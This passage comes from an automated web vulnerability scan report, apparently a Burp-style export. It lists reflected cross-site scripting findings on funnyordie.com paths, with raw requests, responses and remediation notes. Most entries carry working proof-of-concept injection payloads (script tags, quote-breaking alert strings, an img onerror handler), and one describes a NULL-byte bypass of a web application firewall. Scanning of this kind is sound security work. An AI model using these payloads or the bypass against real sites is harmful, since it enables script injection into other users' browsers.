The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c81df"><script>alert(1)</script>01a6abfaf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_viewed?c81df"><script>alert(1)</script>01a6abfaf1=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "87a8d51c15a1a1eb8492e88dccbd809a" X-Runtime: 727 X-Varnish: 1401119762 X-Varnish: 1264351582 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:05:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127965
1.43. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39354'-alert(1)-'23bfa85a96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed?39354'-alert(1)-'23bfa85a96=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "b582204bfbfb271b2d99e3c760974d75" X-Runtime: 303 X-Varnish: 1401120963 X-Varnish: 1264353240 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:06:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:06:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127238
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ea78'-alert(1)-'837b58acd93 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month2ea78'-alert(1)-'837b58acd93 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "4f4cfe76ae0fad871ec608268c075c30" X-Runtime: 1229 X-Varnish: 1401169551 X-Varnish: 1264410622 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:57:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:57:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126361
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1266"><a>a95911fb8d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /browse/words/all/all/most_viewed/this_monthd1266"><a>a95911fb8d3 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "b6ae2c97b398405590da56f5e3339ddf" X-Runtime: 1556 X-Varnish: 1401168277 X-Varnish: 573954904 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:56:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:56:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126370
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38124"-alert(1)-"9d61683ab07 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month38124"-alert(1)-"9d61683ab07 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "ea86b141ef9a0a1a30a269f250745b41" X-Runtime: 1250 X-Varnish: 1401169237 X-Varnish: 573955932 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:57:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:57:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126557
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9175b<img%20src%3da%20onerror%3dalert(1)>8cf8fb23011 was submitted in the REST URL parameter 6. This input was echoed as 9175b<img src=a onerror=alert(1)>8cf8fb23011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/words/all/all/most_viewed/this_month9175b<img%20src%3da%20onerror%3dalert(1)>8cf8fb23011 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "8e20bc13151459f52214dac24182eb87" X-Runtime: 1590 X-Varnish: 1401169998 X-Varnish: 573956715 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:57:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:57:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127651
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... <h1>All Words - Most Viewed This Month9175b<Img Src=A Onerror=Alert(1)>8cf8fb23011</h1> ...[SNIP]...
1.48. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7285"><script>alert(1)</script>c06144fec6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_viewed/this_month?a7285"><script>alert(1)</script>c06144fec6d=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "06762c705a1da670b5593356cb3330c8" X-Runtime: 661 X-Varnish: 1401119435 X-Varnish: 573897331 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:04:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127981
1.49. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830ad"-alert(1)-"2a97fada4e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month?830ad"-alert(1)-"2a97fada4e6=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "cbecd6434fbef7d6182502f747072f75" X-Runtime: 564 X-Varnish: 1401119885 X-Varnish: 1264351732 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:05:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127259
1.50. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d45'-alert(1)-'d91c512f45e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month?13d45'-alert(1)-'d91c512f45e=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "ac941363e0a5f4d44f23727324325183" X-Runtime: 592 X-Varnish: 1401120262 X-Varnish: 1264352262 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:05:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127261
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... ML = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/words/all/all/most_viewed/this_month?13d45'-alert(1)-'d91c512f45e=1"'); }); } });
1.51. http://www.funnyordie.com/caption_contests/068afbc813/caption-contest-for-nov-2-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98851"><script>alert(1)</script>4aa15363717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /caption_contests/068afbc813/caption-contest-for-nov-2-2010?98851"><script>alert(1)</script>4aa15363717=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "1ca2db5d9927de6aca39c288a16b5ac9" X-Runtime: 233 X-Varnish: 1401142905 X-Varnish: 573925915 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:29:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:29:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241256
1.52. http://www.funnyordie.com/caption_contests/068afbc813/caption-contest-for-nov-2-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d83"-alert(1)-"1ac830eb86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/068afbc813/caption-contest-for-nov-2-2010?98d83"-alert(1)-"1ac830eb86f=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "d7b3984ea9cb6ce77c4c34715892248e" X-Runtime: 189 X-Varnish: 1401143556 X-Varnish: 1264380373 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:30:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:30:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241171
1.53. http://www.funnyordie.com/caption_contests/1580841283/caption-contest-for-nov-1-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a912"><script>alert(1)</script>ca9b8ea07ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /caption_contests/1580841283/caption-contest-for-nov-1-2010?8a912"><script>alert(1)</script>ca9b8ea07ba=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "12d5b27bb2918cad2ba642ea2920cbbd" X-Runtime: 272 X-Varnish: 1401145077 X-Varnish: 1264382153 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:31:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:31:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241356
1.54. http://www.funnyordie.com/caption_contests/1580841283/caption-contest-for-nov-1-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed61b"-alert(1)-"37f17992c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/1580841283/caption-contest-for-nov-1-2010?ed61b"-alert(1)-"37f17992c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "dd329bc3525c1287cc809a95b42b911e" X-Runtime: 548 X-Varnish: 1401145734 X-Varnish: 1264382898 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:32:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:32:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241215
1.55. http://www.funnyordie.com/caption_contests/da5caff1e8/caption-contest-for-nov-3-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b22c"><script>alert(1)</script>4497534b8eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /caption_contests/da5caff1e8/caption-contest-for-nov-3-2010?5b22c"><script>alert(1)</script>4497534b8eb=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "fd03060aa35ad9dae4ce3ad258d0454a" X-Runtime: 235 X-Varnish: 1401142949 X-Varnish: 573925968 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:29:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:29:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241690
1.56. http://www.funnyordie.com/caption_contests/da5caff1e8/caption-contest-for-nov-3-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f857b"-alert(1)-"259522f8ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/da5caff1e8/caption-contest-for-nov-3-2010?f857b"-alert(1)-"259522f8ca9=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "ac2aa076c200cdad0013fe4ecbfbb95b" X-Runtime: 540 X-Varnish: 1401143797 X-Varnish: 573927084 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:30:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:30:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 241610
1.57. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8335d"><script>alert(1)</script>c94d9039450 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forums?8335d"><script>alert(1)</script>c94d9039450=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "b811ab52855908f88221c569f1329cae" X-Runtime: 204 X-Varnish: 1401128349 X-Varnish: 573907623 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:13:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:13:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60864
1.58. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 578da'-alert(1)-'c7a64de13ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums?578da'-alert(1)-'c7a64de13ac=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "54a0a71bab6eec3af8b34d41adeaf222" X-Runtime: 505 X-Varnish: 1401129385 X-Varnish: 1264363628 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:15:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:15:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60466
1.59. http://www.funnyordie.com/forums [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/forums
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a0a"-alert(1)-"b067575346a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums?71a0a"-alert(1)-"b067575346a=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "852717b9cec2bae87b793194702df372" X-Runtime: 178 X-Varnish: 1401128879 X-Varnish: 1264363023 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:14:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:14:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60492
1.60. http://www.funnyordie.com/lists/780f0caed2/the-next-career-moves-for-5-election-losers [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23869"-alert(1)-"5859a08b355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lists/780f0caed2/the-next-career-moves-for-5-election-losers?23869"-alert(1)-"5859a08b355=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "b896569e03eb55c3633f932c7dfb1ef1" X-Runtime: 199 X-Varnish: 1401142258 X-Varnish: 1264379002 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:28:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:28:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 269953
1.61. http://www.funnyordie.com/lists/780f0caed2/the-next-career-moves-for-5-election-losers [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f124"><script>alert(1)</script>f1df45b38ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lists/780f0caed2/the-next-career-moves-for-5-election-losers?6f124"><script>alert(1)</script>f1df45b38ec=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "980afde0b0d061d85f493bc39ce0e007" X-Runtime: 550 X-Varnish: 1401140747 X-Varnish: 573923279 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:27:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:27:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 270054
1.62. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c01d3"-alert(1)-"b428f5203da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oembed?c01d3"-alert(1)-"b428f5203da=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: nginx Content-Type: text/html; charset=utf-8 Status: 500 Internal Server Error X-Varnish: 1401114140 Content-Length: 53424 X-Varnish: 573890344 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null) Expires: Fri, 05 Nov 2010 04:59:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:25 GMT Connection: close
1.63. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dfde'-alert(1)-'89dd3d2cfcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oembed?4dfde'-alert(1)-'89dd3d2cfcc=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: nginx Content-Type: text/html; charset=utf-8 Status: 500 Internal Server Error X-Varnish: 1401114329 Content-Length: 53415 X-Varnish: 573890594 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null) Expires: Fri, 05 Nov 2010 04:59:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:37 GMT Connection: close
